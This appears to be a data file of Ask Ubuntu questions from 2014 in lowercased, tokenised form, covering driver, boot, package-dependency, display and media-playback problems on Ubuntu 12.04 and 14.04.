465887	gpsbabel wo n't write into file	i 'm trying to use gpsbabel to communicate with my garmin etrex h ( via a rs232 interface ) when writing the ( unformatted ) output to the terminal , it works without problems : gpsbabel -i garmin -f /dev/serial/by-id/usb-prolific_technology_inc._usb-serial_controller-if00-port0 this returns the ( currently ) only waypoint on my device : 47.xxxxxxn 8.xxxxxxe home/home 334.121519 however , as soon as i add the output type and file , it creates a valid file , but without waypoints : gpsbabel -i garmin -o gpx -f out.gpx -f /dev/serial/by-id/usb-prolific_technology_inc._usb-serial_controller-if00-port0 this is the resulting file : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < gpx version= '' 1.0 '' creator= '' gpsbabel - http : //www.gpsbabel.org '' xmlns : xsi= '' http : //www.w3.org/2001/xmlschema-instance '' xmlns= '' http : //www.topografix.com/gpx/1/0 '' xsi : schemalocation= '' http : //www.topografix.com/gpx/1/0 http : //www.topografix.com/gpx/1/0/gpx.xsd '' > < time > 2014-05-14t15:39:24z < /time > < /gpx > what am i doing wrong ?
465890	after installing ubuntu 14.04 my windows 8.1 seems to be missing ?	i installed ubuntu 14.04 when it was still in beta , and i clicked the option run along side windows . it seems that it didnt actually do that or possibly broke the boot for it something . i am still somewhat new to this and messing with the grubs kind of a shaky area for me . ill attach a picture of my gparted if that helps any . would definately appreciate some help . i just ran sudo fdisk -l and got warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x4073875b device boot start end blocks id system /dev/sda1 1 976773167 488386583+ ee gpt partition 1 does not start on physical sector boundary . ccslover @ ccslover-x550ca : ~ $
465892	all drivers work perfectly when using 'try ubuntu ' , but wireless breaks after installation	i have been able to boot and run ubuntu perfectly off of my usb in 'try it now ' mode . it lets me select the proprietary drivers for my broadcom wireless on my alienware 17 with no flaws . after i install ubuntu , selecting the drivers causes the system to start installation , then freeze the install bar . the only difference i 've been able to correlate is that during the live trial , i 'm not asked for an administrator password to allow the non-open source driver . thank you for reading !
465897	`` gave up waiting for root device , '' boot-repair failed	i had fedora 20 installed on my laptop , then i recently did a clean install of ubuntu 14.04 on the machine . finished the install , and restarted the machine to get this screen : https : //imgur.com/ddlyrv3 i have used ubuntu on this machine sucessfully in previous installations . i ran boot-repair and it said it successfully repaired grub . so i restarted the machine and got the same screen from above . here are the pastebin results : http : //paste.ubuntu.com/7463525/ can you please help ? i 'm at a complete loss . it seems grub is possibly corrupted , but i 'm also getting about error about `` /dev/disk/by-uuid/ ... . does not exist . ''
465898	my 3d windows does n't work	i 'm running ubuntu 14.04 64-bit and my laptop is an asusx550ca . intel® core™ i3-3217u cpu @ 1.80ghz × 4 intel® ivybridge mobile graphics i ran the command /usr/lib/nux/unity_support_test -p and i get all yes . i 'm currently in gnome flashback ( compiz ) because lightdm had been causing me quite a few problems . i know i can live without it but i would like to be able to have that working properly . how can i solve this ?
465899	file collision between codeblocks-headers and codeblocks-dev	whenever i try to run sudo apt-get -f install i get this error . here is all of the output of sudo apt-get -f install : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : codeblocks-contrib codeblocks-dev gamin libcodeblocks0 libgamin0 libwxsmithlib-dev recommended packages : valgrind the following packages will be removed : codeblocks-headers the following new packages will be installed : gamin libgamin0 libwxsmithlib-dev the following packages will be upgraded : codeblocks-contrib codeblocks-dev libcodeblocks0 3 upgraded , 3 newly installed , 1 to remove and 20 not upgraded . 5 not fully installed or removed . need to get 0 b/5,309 kb of archives . after this operation , 1,163 kb of additional disk space will be used . do you want to continue ? [ y/n ] y ( reading database ... 174515 files and directories currently installed . ) preparing to unpack ... /codeblocks-dev_13.12-3_amd64.deb ... unpacking codeblocks-dev ( 13.12-3 ) over ( 13.12-1 ) ... dpkg : error processing archive /var/cache/apt/archives/codeblocks-dev_13.12-3_amd64.deb ( -- unpack ) : trying to overwrite '/usr/include/codeblocks/externaldepsdlg.h ' , which is also in package codeblocks-headers 13.12-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/codeblocks-dev_13.12-3_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) does anyone think they can help me solve this problem ?
465902	can not type the @ symbol on spanish keyboard ?	i 've recently installed ubuntu 14.04 lts , and can not print the @ symbol . i mean get the symbol shown in the screen , when i type an email in the browser , into a document , etc . my keyboard is set in spanish . i 've tried alt + 64 -using the numeric keyboard- and nothing happens . i 've tried creating a shortcut , ( setting it as : alt+64 ) , and is set as `` disabled '' ... what should i do ?
465903	i have the 0.19.0 okular version , but it still does n't let me save annotations in a pdf	i have trouble saving annotations and highlighting i made in okular as a pdf . i have the latest okular version : qt : 4.8.2 kde : 4.13.0 okular : 0.19.0 and use ubuntu 12.04 ( precise ) . i 've tried the first two solutions of this thread : how to install okular 0.15 on 12.04 lts ? but they have n't worked for me . i think the problem is ( as mentioned in other threads ) is the libpoppler package . when i use sudo apt-cache okular it says ... depends : ... .libpoppler-qt4-3 ( > = 0.18 ) ... . i know by now that i need okular to use the 0.20 version of libpoppler , but i do n't know how to force it to use it . as mentioned , i 've tried the solution in the other thread . edit : : ~ $ apt-cache policy libpoppler-qt4-3 libpoppler-qt4-3 : installiert : 0.18.4-1ubuntu3.1 kandidat : 0.18.4-1ubuntu3.1 versionstabelle : *** 0.18.4-1ubuntu3.1 0 500 http : //de.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 0.18.4-1ubuntu2 0 500 http : //de.archive.ubuntu.com/ubuntu/ precise/main amd64 packages edit after adding the ppa with sudo apt-add-repository ppa : kalakris/okular and updating my system with sudo apt-get update & & sudo apt-get upgrade edit i get the ouput : ~ $ sudo apt-get update & & sudo apt-get upgrade ok http : //dl.google.com stable release.gpg ok http : //dl.google.com stable release ok http : //repository.spotify.com stable release.gpg hole:1 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] ok http : //dl.google.com stable/main amd64 packages ok http : //archive.canonical.com precise release.gpg ok http : //repository.spotify.com stable release ok http : //ppa.launchpad.net precise release.gpg ok http : //ppa.launchpad.net precise release.gpg ok http : //ppa.launchpad.net precise release.gpg ok http : //dl.google.com stable/main i386 packages ok http : //repository.spotify.com stable/non-free amd64 packages ign http : //dl.google.com stable/main translationindex hole:2 http : //security.ubuntu.com precise-security release [ 49,6 kb ] ok http : //repository.spotify.com stable/non-free i386 packages hole:3 http : //extras.ubuntu.com precise release.gpg [ 72 b ] ok http : //archive.canonical.com precise release ok http : //ppa.launchpad.net precise release ok http : //ppa.launchpad.net precise release ok http : //extras.ubuntu.com precise release ok http : //archive.canonical.com precise/partner amd64 packages ign http : //repository.spotify.com stable/non-free translationindex ok http : //ppa.launchpad.net precise release ok http : //extras.ubuntu.com precise/main sources ok http : //archive.canonical.com precise/partner i386 packages ign http : //archive.canonical.com precise/partner translationindex ok http : //ppa.launchpad.net precise/main sources ok http : //ppa.launchpad.net precise/main amd64 packages ok http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ok http : //ppa.launchpad.net precise/main sources ok http : //ppa.launchpad.net precise/main amd64 packages ok http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hole:4 http : //security.ubuntu.com precise-security/restricted sources [ 2.494 b ] ok http : //extras.ubuntu.com precise/main amd64 packages ok http : //extras.ubuntu.com precise/main i386 packages ok http : //de.archive.ubuntu.com precise release.gpg ign http : //extras.ubuntu.com precise/main translationindex ok http : //de.archive.ubuntu.com precise-updates release.gpg hole:5 http : //security.ubuntu.com precise-security/main sources [ 104 kb ] ok http : //ppa.launchpad.net precise/main sources ok http : //de.archive.ubuntu.com precise release ok http : //ppa.launchpad.net precise/main amd64 packages ok http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ok http : //de.archive.ubuntu.com precise-updates release ok http : //de.archive.ubuntu.com precise/restricted sources ok http : //de.archive.ubuntu.com precise/main sources ok http : //de.archive.ubuntu.com precise/multiverse sources ok http : //de.archive.ubuntu.com precise/universe sources ok http : //de.archive.ubuntu.com precise/main amd64 packages ok http : //de.archive.ubuntu.com precise/restricted amd64 packages ok http : //de.archive.ubuntu.com precise/universe amd64 packages ok http : //de.archive.ubuntu.com precise/multiverse amd64 packages ok http : //de.archive.ubuntu.com precise/main i386 packages ok http : //de.archive.ubuntu.com precise/restricted i386 packages hole:6 http : //security.ubuntu.com precise-security/multiverse sources [ 1.794 b ] hole:7 http : //security.ubuntu.com precise-security/universe sources [ 30,9 kb ] hole:8 http : //security.ubuntu.com precise-security/main amd64 packages [ 385 kb ] ok http : //de.archive.ubuntu.com precise/universe i386 packages ok http : //de.archive.ubuntu.com precise/multiverse i386 packages ok http : //de.archive.ubuntu.com precise/main translationindex ok http : //de.archive.ubuntu.com precise/multiverse translationindex ok http : //de.archive.ubuntu.com precise/restricted translationindex ok http : //de.archive.ubuntu.com precise/universe translationindex ok http : //de.archive.ubuntu.com precise-updates/restricted sources ign http : //dl.google.com stable/main translation-de_de ok http : //de.archive.ubuntu.com precise-updates/main sources ok http : //de.archive.ubuntu.com precise-updates/multiverse sources ok http : //de.archive.ubuntu.com precise-updates/universe sources ign http : //dl.google.com stable/main translation-de ok http : //de.archive.ubuntu.com precise-updates/main amd64 packages ok http : //de.archive.ubuntu.com precise-updates/restricted amd64 packages ok http : //de.archive.ubuntu.com precise-updates/universe amd64 packages ign http : //dl.google.com stable/main translation-en ok http : //de.archive.ubuntu.com precise-updates/multiverse amd64 packages ok http : //de.archive.ubuntu.com precise-updates/main i386 packages ok http : //de.archive.ubuntu.com precise-updates/restricted i386 packages ok http : //de.archive.ubuntu.com precise-updates/universe i386 packages ok http : //de.archive.ubuntu.com precise-updates/multiverse i386 packages ok http : //de.archive.ubuntu.com precise-updates/main translationindex ok http : //de.archive.ubuntu.com precise-updates/multiverse translationindex ok http : //de.archive.ubuntu.com precise-updates/restricted translationindex ok http : //de.archive.ubuntu.com precise-updates/universe translationindex ok http : //de.archive.ubuntu.com precise/main translation-de ign http : //repository.spotify.com stable/non-free translation-de_de ok http : //de.archive.ubuntu.com precise/main translation-en ok http : //de.archive.ubuntu.com precise/multiverse translation-de ok http : //de.archive.ubuntu.com precise/multiverse translation-en ok http : //de.archive.ubuntu.com precise/restricted translation-de ok http : //de.archive.ubuntu.com precise/restricted translation-en hole:9 http : //security.ubuntu.com precise-security/restricted amd64 packages [ 4.627 b ] hole:10 http : //security.ubuntu.com precise-security/universe amd64 packages [ 93,1 kb ] ign http : //repository.spotify.com stable/non-free translation-de ok http : //de.archive.ubuntu.com precise/universe translation-de ok http : //de.archive.ubuntu.com precise/universe translation-en ok http : //de.archive.ubuntu.com precise-updates/main translation-de ok http : //de.archive.ubuntu.com precise-updates/main translation-en hole:11 http : //security.ubuntu.com precise-security/multiverse amd64 packages [ 2.453 b ] ign http : //repository.spotify.com stable/non-free translation-en hole:12 http : //security.ubuntu.com precise-security/main i386 packages [ 414 kb ] ok http : //de.archive.ubuntu.com precise-updates/multiverse translation-de ok http : //de.archive.ubuntu.com precise-updates/multiverse translation-en ok http : //de.archive.ubuntu.com precise-updates/restricted translation-de ok http : //de.archive.ubuntu.com precise-updates/restricted translation-en ok http : //de.archive.ubuntu.com precise-updates/universe translation-de ok http : //de.archive.ubuntu.com precise-updates/universe translation-en ign http : //archive.canonical.com precise/partner translation-de_de ign http : //extras.ubuntu.com precise/main translation-de_de hole:13 http : //security.ubuntu.com precise-security/restricted i386 packages [ 4.620 b ] hole:14 http : //security.ubuntu.com precise-security/universe i386 packages [ 97,6 kb ] hole:15 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2.636 b ] ok http : //security.ubuntu.com precise-security/main translationindex ok http : //security.ubuntu.com precise-security/multiverse translationindex ok http : //security.ubuntu.com precise-security/restricted translationindex ok http : //security.ubuntu.com precise-security/universe translationindex ign http : //ppa.launchpad.net precise/main translation-de_de ign http : //ppa.launchpad.net precise/main translation-de ign http : //archive.canonical.com precise/partner translation-de ign http : //extras.ubuntu.com precise/main translation-de ok http : //security.ubuntu.com precise-security/main translation-en ok http : //security.ubuntu.com precise-security/multiverse translation-en ok http : //security.ubuntu.com precise-security/restricted translation-en ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-de_de ign http : //ppa.launchpad.net precise/main translation-de ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-de_de ign http : //archive.canonical.com precise/partner translation-en ign http : //extras.ubuntu.com precise/main translation-en ok http : //security.ubuntu.com precise-security/universe translation-en ign http : //ppa.launchpad.net precise/main translation-de ign http : //ppa.launchpad.net precise/main translation-en es wurden 1.194 kb in 2 s geholt ( 459 kb/s ) paketlisten werden gelesen ... fertig paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig die folgenden pakete werden aktualisiert ( upgrade ) : libxml2 libxml2 : i386 libxml2-utils python-libxml2 4 aktualisiert , 0 neu installiert , 0 zu entfernen und 0 nicht aktualisiert . es müssen 1.561 kb an archiven heruntergeladen werden . nach dieser operation werden 0 b plattenplatz zusätzlich benutzt . möchten sie fortfahren [ j/n ] ? j hole:1 http : //de.archive.ubuntu.com/ubuntu/ precise-updates/main libxml2 i386 2.7.8.dfsg-5.1ubuntu4.7 [ 662 kb ] hole:2 http : //de.archive.ubuntu.com/ubuntu/ precise-updates/main libxml2 amd64 2.7.8.dfsg-5.1ubuntu4.7 [ 673 kb ] hole:3 http : //de.archive.ubuntu.com/ubuntu/ precise-updates/main libxml2-utils amd64 2.7.8.dfsg-5.1ubuntu4.7 [ 39,9 kb ] hole:4 http : //de.archive.ubuntu.com/ubuntu/ precise-updates/main python-libxml2 64 2.7.8.dfsg-5.1ubuntu4.7 [ 186 kb ] es wurden 1.561 kb in 3 s geholt ( 469 kb/s ) ( lese datenbank ... 1113479 dateien und verzeichnisse sind derzeit installiert . ) vorbereitung zum ersetzen von libxml2 : i386 2.7.8.dfsg-5.1ubuntu4.6 ( durch ./libxml2_2.7.8.dfsg-5.1ubuntu4.7_i386.deb ) ... libxml2 wird de-konfiguriert ... ersatz für libxml2 : i386 wird entpackt ... vorbereitung zum ersetzen von libxml2 2.7.8.dfsg-5.1ubuntu4.6 ( durch ... /libxml2_2.7.8.dfsg-5.1ubuntu4.7_amd64.deb ) ... ersatz für libxml2 wird entpackt ... libxml2 : i386 ( 2.7.8.dfsg-5.1ubuntu4.7 ) wird eingerichtet ... libxml2 ( 2.7.8.dfsg-5.1ubuntu4.7 ) wird eingerichtet ... trigger für libc-bin werden verarbeitet ... ldconfig deferred processing now taking place ( lese datenbank ... 1113479 dateien und verzeichnisse sind derzeit installiert . ) vorbereitung zum ersetzen von libxml2-utils 2.7.8.dfsg-5.1ubuntu4.6 ( durch ... /libxml2-utils_2.7.8.dfsg-5.1ubuntu4.7_amd64.deb ) ... ersatz für libxml2-utils wird entpackt ... vorbereitung zum ersetzen von python-libxml2 2.7.8.dfsg-5.1ubuntu4.6 ( durch ... /python-libxml2_2.7.8.dfsg-5.1ubuntu4.7_amd64.deb ) ... ersatz für python-libxml2 wird entpackt ... trigger für man-db werden verarbeitet ... libxml2-utils ( 2.7.8.dfsg-5.1ubuntu4.7 ) wird eingerichtet ... python-libxml2 ( 2.7.8.dfsg-5.1ubuntu4.7 ) wird eingerichtet ... sorry for the mass of information , feel free to edit away everything unnecessary ( i 'm not sure what is important here ) using apt-cache policy libpoppler-qt4-3 i get the output : ~ $ apt-cache policy libpoppler-qt4-3 libpoppler-qt4-3 : installiert : 0.18.4-1ubuntu3.1 kandidat : 0.18.4-1ubuntu3.1 versionstabelle : *** 0.18.4-1ubuntu3.1 0 500 http : //de.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 0.18.4-1ubuntu2 0 500 http : //de.archive.ubuntu.com/ubuntu/ precise/main amd64 packages hence , the same as before . and it still does n't work . ( when i try `` save as '' , i get an error message , when i `` save a copy '' , the annotations are not saved . ) i 'd appreciate any help , thanks , hannah
465905	ubuntu 14.04 install error	i 'm trying to install ubuntu 14.04 alongside windows 8.1 . since option `` install alongside '' is missing there , i use `` something else '' . then i created 3 standard partitions ( / , /home , swap ) , click `` install now '' , the screen changes to the one with time zones , however a dialog with '' ? ? ? ? ? ? '' title and '' ? ? ? ? ? ? '' message appears . wtf ? i click ok/continue , but it returns me back to the screen with partitions ... what am i doing wrong ? these things used to be so easy ... .
465906	hp pinter driver ( hplip ) installations methods	sorry but i have another newbie question . i installed hplip using the command line method , but ended up with the common gypo error . sad to say in trying to correct the issue i ended up with a bigger mess . after doing some research i found that i missing some python dependences ( more than one ) and i also reference to using synaptic or the software center question 1 ) which way is the best installation better ? question 2 ) if were to use synaptic would it take care of this dependence and only others that may exist ?
465908	how to change background of nautilus in ubuntu 14.04	as the question goes , how can i change the background of nautilus in ubuntu 14.04 ? ? i have already tried dconf-editor , gtk-tweaker , gnome-tweaker . they change the color of some parts of some pannelsbut not the background of nautilus in icons view ... thank you in advance ,
465909	looking for a music player to control speed and transpose songs	i am using ubuntu 14.04 and i am looking for a music player that is able to control the speed of a song and transpose it easily . i know vlc media player can change the speed but its a bit complicated and its getting annoying after a short time of using it . the player should be able to play .mp3 data , midi ability would be nice but is not necessary .
465912	having backup kernels in ubuntu	i had many kernels in my ubuntu , but recently i deleted all of them ( except one ) as they were corrupt . now i am left with a single kernel onto which i log in every day . i am afraid as to what will happen if this kernel gets corrupt due to some updates - i 'll be totally unable to boot due to lack of backup kernels . is there a way to have additional backup kernels ? can i download past kernels into some folder so that they show up when i log in ?
465917	how to view rgb 565 format image on ubuntu	is there any tool on ubuntu to view rgb 565 format image ? if yes , can you please tell me how to install it ?
465924	how to map < modifier > + hjkl to arrow key functionality ?	i 've been getting so used to vim 's hjkl for moving around recently , and find myself wanting to use them right after alt tabbing out of vim . what would be the best way to map fn + h/j/k/l to left/down/up/right ? edit : any < modifier > + h/j/k/l would be satisfactory as long as it does n't conflict with other keyboard shortcuts .
465927	how can i install a driver for my usb wireless ? medialink usb150n	sorry , completely new to linux , and it shows . i 've got lubuntu 14.04 installed , and need to install a driver for my wireless adapter . i found the following instructions , but ca n't figure out how to implement them . i 'm clearly missing some basic information . from the medialink site : linux installation instructions 1 . $ tar –xvf rt3070_linux_sta_v2.1.1.0 go to `` ./2009_0525_rt3070_linux_sta_v2.1.1.0 '' directory . 2 . in makefile set the `` mode = sta '' in makefile and chose the target to linux by set '' target = linux '' define the linux kernel source to include file path linux_src modify to meet your needs . 3 . in os/linux/config.mk define the gcc and ld of the target machine define the compiler flags cflags modify to meet your needs . ** build to be controlled by networkmanager or wpa_supplicant wext functions please set 'has_wpa_supplicant=y' 'has_native_wpa_supplicant_support=y ' . = > # > cd wpa_supplicant-x.x = > # > ./wpa_supplicant -dwext -ira0 -c wpa_supplicant.conf -d ** build to be controlled by wpasupplicant with ralink driver please set 'has_wpa_supplicant=y' 'has_native_wpa_supplicant_support=n ' . = > # > cd wpa_supplicant-0.5.7 = > # > ./wpa_supplicant -dralink -ira0 -c wpa_supplicant.conf -d 4. and and $ make # compile driver source code # to fix `` error : too few arguments to function ¡¥iwe_stream_add_event '' = > $ patch -i os/linux/sta_ioctl.c.patch os/linux/sta_ioctl.c 5 . $ cp rt2870sta.dat /etc/wireless/rt2870sta/rt2870sta.dat note : if you don’t find this folder , you will need to set up a new folder , “/etc/wireless/rt2870sta “ . 6. load driver , go to `` os/linux/ '' directory . # [ kernel 2.4 ] # $ /sbin/insmod rt2870sta.o # $ /sbin/ifconfig ra0 inet your_ip up # [ kernel 2.6 ] # $ /sbin/insmod rt2870sta.ko # $ /sbin/ifconfig ra0 inet your_ip up 7. unload driver $ /sbin/ifconfig ra0 down $ /sbin/rmmod rt2870sta how to solve this ?
465928	ar9462 working only from command line and only with wep	i installed ubuntu 14.04 on this machine http : //shop.lenovo.com/us/en/tablets/lenovo/miix-series/miix-2-11-inch/ it has several issues that i did n't solved yet , but the most annoying thing is that it has problems with network connection . this computer does not have any ethernet , so only way how to connect is via wifi . lspci 02:00.0 network controller : qualcomm atheros ar9462 wireless network adapter ( rev 01 ) i am able to connect to my ap only via wep encryption through these commands iwconfig wlan0 enc on iwconfig wlan0 ap any essid ap_essid_name key s : wep_ascii_password ifconfig wlan0 up dhclient wlan0 from the desktop environment it is not possible . even if i am connected from command line the `` indicator applet complete '' is still showing network disconnected and `` enable wifi '' or `` wifi networks '' are still disabled . connecting to wpa network through command line is not so easy so i did n't tested it yet . i found there some issues with wpa and this chipset , but i think my problem is something else . any suggestions how to manage wifi in user friendly way from gui , or where to search what is wrong ? i want to use this device as tablet and not wear the keyboard all the time , and anyway typing on its tiny keyboard is possible , but not comfortable .
465929	how can i create a bootable usb from an iso image ?	i 'm trying to make a bootable usb drive from an iso file . i have been trying with winusb . in the winusb graphical interface my usb drive is not showing up , even though it auto mounts . so i 'm trying to do it from the command line following these steps : to install a windows iso on ntfs partition and edit the master boot record ( mbr ) of the device use the following commands : $ sudo winusb -- install iso /path/ /partition/ example : $ sudo winusb -- format desktop/setho/win7.iso /dev/sdd1 winusb : create a bootable windows usb in linux i do n't understand what they want me to edit in mbr . and what is the second command for -- format . is n't it enough to run -- install do i need to have the iso mounted in /media/ . and how can i be sure it will be bootable ?
465930	adjust urgent animation 's time span ?	currently in ubuntu 14.04 with unity 7.2.0 , when you receive a message from an instant messenger client ( or anything else that would classify as the application needing attention ) , that icon in your unity launcher will wiggle . that 's all well and good , but it 's useless unless you happen to be looking at the unity bar at that point in time . as a result , the vast majority of notifications go missed . i can say with confidence that this frustrates a huge amount of people given the amount of users who have said this too bothers them . i 'd like to adjust the length of time that the wiggle continues for . if it can not be adjusted for a more consistent time frame ( as in , it wiggles every 60 seconds indefinitely until the application gets attention ) , then at the very least it 'd be nice to adjust it to a crazy high amount of time so it keeps wiggling until the user clicks . on countless other operating systems and distros , things like this are possible . so with that i ask ... how can i do this in ubuntu 14.04 ?
465931	xorg.conf is reset after every reboot	i have an asus laptop with dual intel / nvidia graphics . i 've changed the screen resolution in nvidia settings manager , and clicked `` save to x configuration ... '' . i can see in gedit that the file is indeed changed and saved , but when i reboot , the original xorg.conf takes its place . any ideas as to what might fix this ? here 's the nvidia-settings xorg.conf : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ roseapple ) mon feb 3 15:07:22 utc 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : xconfig , vertrefresh source : xconfig identifier `` monitor0 '' vendorname `` unknown '' modelname `` crt-0 '' horizsync 47.4 - 47.4 vertrefresh 60.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 550m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` 1366x768 +0+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection this is what it gets reset to : section `` serverlayout '' identifier `` layout '' screen 0 `` nvidia '' inactive `` intel '' endsection section `` device '' identifier `` intel '' driver `` modesetting '' busid `` pci:0 @ 0:2:0 '' endsection section `` screen '' identifier `` intel '' device `` intel '' endsection section `` device '' identifier `` nvidia '' driver `` nvidia '' busid `` pci:1 @ 0:0:0 '' option `` constraincursor '' `` off '' endsection section `` screen '' identifier `` nvidia '' device `` nvidia '' option `` allowemptyinitialconfiguration '' `` on '' endsection
465932	ca n't play .ts format from a samsung tv recording	i recored a movie by samsung tv and it has a .ts format , and i ca n't play it . i tried vlc and smplayer . none of them work . in vlc i get this error : [ 0x7fbc40c018b8 ] ts demux error : libdvbpsi ( misc psi ) : bad crc_32 table 0x73 ! ! !
465933	achieving extended screen effect - cross platform	is is possible to connect my ubuntu 12.04 running laptop with any other laptop running windows and achieve extended screen effect ?
465941	theoretical screen resolution	after my laptop 's screen broke down , i sent the laptop back to have the screen replaced . unfortunately , it seems that they replaced it with a lower resolution screen . i have the faint hope that the screen 's resolution is actually higher that what ubuntu is able to display ( although it seems unlikely ) . is there a way to know for sure the physical ( or `` theoretical '' ) resolution of the screen ? edit : i tried xrandr as suggested in the comments , here is the output : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) does this mean there 's definitely no way the screen could be actually higher res than 1366 x 768 ? ( i was expecting 1600*900 ) edit : not sure why my question was downvoted . anyway , since it seems there is no easy way to know for sure the native resolution of the screen , i fetched a screwdriver , took the screen apart to get its reference , and looked it up . it was a 1366x768 indeed , as i feared .
465942	how can i share my connection on windows 8.1 to vmware linux ubuntu	i trying to share my cable connection on windows 8.1 with a vmware linux ubuntu , but this does n't works . the linux just stay trying to connect but without a success . this is my virtual network editor : host-only nat ipconfig on windows : someone knows what can i do in this case ?
465943	no sound in .mkv after upgrade to ubuntu 14.04	i was using ubuntu 13.10 previously , and everything was working fine . prior to upgrading to 14.04 , i deleted some of the old kernels . then , once i upgraded , the sound for .mkv was gone . i use vlc , but totem could not play sound either . other video files worked fined though . i thought the issue was with codecs , so i installed all libav* , gstreamer* , ubuntu-restricted-extras packages . still nothing . then i deleted the rest of the old kernels but it still did n't work . i found a solution , which is using gnome mplayer , but this player is terrible - when transitioning scenes , you could see the lines in the video and , on larger files ( 4gb+ ) the sound breaks once in a while . i would really like to be able to play it in vlc . i was thinking the issue was with vlc , since they do n't have an `` official '' version for 14.04 , but since it does n't work on totem as well , i do n't think that 's the issue . i do n't think the problem is with codecs , since i installed it , but is it possible that the codecs need some old kernels to work ? how could i find out which version i need and download an older version of kernel ? thank you edit : output of avconv -i problem.mkv : avconv version 9.13-6:9.13-0ubuntu0.14.04.1 , copyright ( c ) 2000-2014 the libav developers built on may 9 2014 13:34:03 with gcc 4.8 ( ubuntu 4.8.2-19ubuntu1 ) input # 0 , matroska , webm , from 'problem.mkv ' : duration : 00:42:20.22 , start : 0.000000 , bitrate : n/a stream # 0.0 ( eng ) : video : h264 ( high ) , yuv420p , 1280x720 , par 1:1 dar 16:9 , 23.98 fps , 23.98 tbr , 1k tbn , 47.95 tbc ( default ) stream # 0.1 : audio : ac3 , 48000 hz , 5.1 , fltp , 384 kb/s ( default ) at least one output file must be specified
465945	can not install lubuntu-desktop	i am trying to install the lubuntu-desktop package . user @ host : ~ $ sudo apt-get install lubuntu-desktop fails with this error : the following packages have unmet dependencies . lubuntu-desktop : depends : gdebi but it is not going to be installed e : unable to correct problems , you have held broken packages . so i proceed with user @ host : ~ $ sudo apt-get install gdebi leading to the following packages have unmet dependencies . gdebi : depends : gdebi-core ( = 0.9.5.3ubuntu2 ) but 0.9.5.3ubuntu1 is to be installed recommends : libgtk2-perl but it is not going to be installed e : unable to correct problems , you have held broken packages . so i go ahead and grab this libgtk2 -- perl package , and then try installing gdebi again , leading to : user @ host : ~ $ sudo apt-get install gdebi reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . gdebi : depends : gdebi-core ( = 0.9.5.3ubuntu2 ) but 0.9.5.3ubuntu1 is to be installed e : unable to correct problems , you have held broken packages . what has gone wrong but mainly , how do i correct this ? ? edit : adding requested information gdebi user @ host : ~ $ sudo apt-cache policy gdebi gdebi : installed : ( none ) candidate : 0.9.5.3ubuntu2 version table : 0.9.5.3ubuntu2 0 500 http : //it.archive.ubuntu.com/ubuntu/ trusty-proposed/universe amd64 packages 0.9.5.3ubuntu1 0 500 http : //it.archive.ubuntu.com/ubuntu/ trusty-updates/universe amd64 packages 0.9.5.3 0 500 http : //it.archive.ubuntu.com/ubuntu/ trusty/universe amd64 packages gdebi-core user @ host : ~ $ sudo apt-cache policy gdebi-core gdebi-core : installed : 0.9.5.3ubuntu1 candidate : 0.9.5.3ubuntu1 version table : *** 0.9.5.3ubuntu1 0 500 http : //it.archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages 100 /var/lib/dpkg/status 0.9.5.3 0 500 http : //it.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages
